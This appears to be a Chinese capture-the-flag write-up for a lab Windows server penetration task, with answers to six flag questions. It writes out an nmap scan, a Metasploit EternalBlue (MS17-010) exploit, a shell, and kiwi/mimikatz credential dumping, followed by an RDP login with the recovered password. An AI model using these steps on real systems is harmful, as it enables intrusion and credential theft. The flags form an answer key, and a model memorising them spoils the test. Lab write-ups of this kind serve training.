任务十七:windows操作系统渗透测试
任务环境说明:
服务器场景:
服务器场景操作系统:windows
1.通过本地PC中渗透测试平台Kali对服务器场景进行系统服务及版本扫描渗透测试,并将该操作显示结果中445端口对应的服务版本信息字符串作为Flag值提交;
使用nmap工具扫描靶机,nmap -p- -T4 -sV 靶机ip
Flag:Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
2.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景网络连接信息中的DNS信息作为Flag值 (例如:114.114.114.114) 提交;
这道题我们使用ms17-010模块打
Msfconsole
Use exploit/windows/smb/ms17_010_eternalblue
Set rhosts 靶机ip
Run
Shell
Ipconfig /all
Flag:121.212.121.212
3.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景中的当前最高账户管理员的密码作为Flag值提交;
ctrl+c,退回meterpeter命令行
Load kiwi
Creds_all
使用这个密码破解工具破解出最高管理员密码
Flag:P@ssw0rd
4.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文件名称作为Flag值提交;
Rdesktop 靶机ip
远程连接靶机桌面
账号administrator密码P@ssw0rd
Flag:flag123456789
5.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文档内容作为Flag值提交;
Flag:846548795432
6.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,将该场景桌面上222文件夹中唯一一个图片中的英文单词作为Flag值提交;
Flag:anonymous